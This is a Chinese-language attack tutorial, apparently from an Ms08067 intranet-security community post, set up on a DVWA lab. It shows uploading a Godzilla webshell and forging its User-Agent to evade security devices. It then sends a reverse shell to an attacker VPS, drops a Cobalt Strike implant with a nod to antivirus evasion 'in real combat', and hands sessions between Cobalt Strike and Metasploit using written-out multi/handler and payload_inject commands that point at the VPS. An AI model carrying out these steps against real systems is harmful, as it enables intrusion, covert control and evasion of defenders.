文章来源｜MS08067 内网安全知识星球

本文作者：BlackCat（Ms08067内网安全小组成员）

内网纵横四海  认准Ms08067

环境：

Windows:  192.168.93.3
VPS：x.x.x.x
⼯具：CobaltStrike4.1、MSF、哥斯拉v2.92

实验场景DVWA靶场，通过靶场的上传漏洞位置，上传webshell

然后⽤冰蝎或者其他webshell⼯具连接：

冰蝎下载地址：

https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6

我这⾥⽤的上阶段⽐较⽕的哥斯拉，在哥斯拉安装之前，你需要安装jdk1.8的环境。双击Godzilla.jar打开，此时会在同⽬录下⽣成data.db数据库存放数据，同时它⽀持流量加密和修改特征，可以⼀定程度上防⽌被安服设备发现。同时可以⾃⽣成payload，

哥斯拉下载地址：⽬前最新的版本为V2.92

https://github.com/BeichenDream/Godzilla/releases/tag/v2.92-godzilla

个⼈感觉唯⼀缺点就是⻚⾯有点丑。

既然说了可以隐藏特征，那么这⾥我们就伪造⼀下特征：

⾸先wireshark抓包看下 未作修改的数据包是什么样⼦：

先⽣成⼀个payload：点击. ⻚⾯ -- 管理 -- ⽣成

webs hell有两种加密规则，Raw or Base64 加密

Raw:Raw是将加密后的数据直接发送或者输出
Base64:Base64是将加密后的数据再进⾏Base64编码

然后选择pass是连接密码，payload类型 ，⼀共是三种类型，

这⾥我的webshell⽂件是：1.php。

通过DVWA靶场上传到本地，然后链接shell ,⾥⾯参数⼀定要和我们创建的⼀样。

然后我们测试连接，成功后添加就⾏，

进⼊到操作模式，在命令执⾏处执⾏⼀条命令：dir，同时wireshark开启抓包

然后就是查看包内容：没更改之前是这样的

这⾥⼀些安服设备都会过滤  User-agent（简称UA），所以我们这⾥要根据对⽅的⽹络环境去修改：

添加⽬标处也可以更改，再次抓包发现成功 UA成功修改了。

⾄此webshell⽅⾯基本就不需要我们再去配置什么了,如果为了保险起⻅可以在对webshell进⾏⼀定的隐蔽。

接下来就是CS、MSF上线。

这⾥他有⾃带的反弹shell⼯具 ；先尝试能否成功，打开我们的VPS 机的MSF 按照他的配置进⾏配置 ，然后 run 开始监听 10086端⼝观测 VPS动态，发现成功反弹shell。

这⾥ MSF已经上线，我们现在要让CS 也上线，

这⾥发现⼀个问题，脚本shell的权限很不稳，MSF权限经常会丢失，所以还是建议直接上传CS⻢或者通过其他⽅式上线CS。这⾥上传CS⻢⽅式，实战中注意免杀。

通过webshell⼯具的⽂件上传到本地机器⽬录。然后运⾏上线直接管理员权限，都省着我提权了，这⾥推荐⼏个提权CS插件：

https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
https://github.com/zer0yu/Awesome-CobaltStrike

尝试把CS会话在MSF端上线

当CobaltStrike获得了⼀个上线机器，想把这个⽬标传给Metasploit中的meterpreter，获得⼀个session进⾏控制。在Metasploit执⾏以下命令：

MSF：

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost vps：IP
set lport 10010
exploit -j #-j 后台监听 可不选

CS:

⾸先有⼀个已经建⽴会话的shell，然后添加监听器Listener，HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:10010

选择我们刚才建⽴的 listener ，然后等待MSF端，过程⼤概1-2分钟

MSF会话反弹给CS:

这⾥只是为了实验，所以就⽤这个CS反弹来的shell，实际中请结合具体内⽹情况。
CS适合外围突破，MSF适合内⽹横向，当然也看个⼈喜好

1、⾸先把msf上获取到的meterpreter挂在后台运⾏

Background  #就是返回的意思

CS :创建⼀个监听，payload⽅式要与MSF相同即可。

MSF：

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set disablepayloadhandler true
#默认情况下，payload_inject执⾏之后会在本地产⽣⼀个新的handler，由于我们已经有了⼀个，所以
不需要在产⽣⼀个，所以这⾥我们设置为true
set lhost x.x.x.x                     #cobaltstrike监听的ip
set lport 10001                       #cobaltstrike监听的端⼝
set session 1                         #这⾥是获得的session的id
exploit

然后正常情况下 等待上线即可,我这⾥不做演示了，因为 VPS卡死了。。。

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群，内部微信群永久有效！

目前40000+人已关注加入我们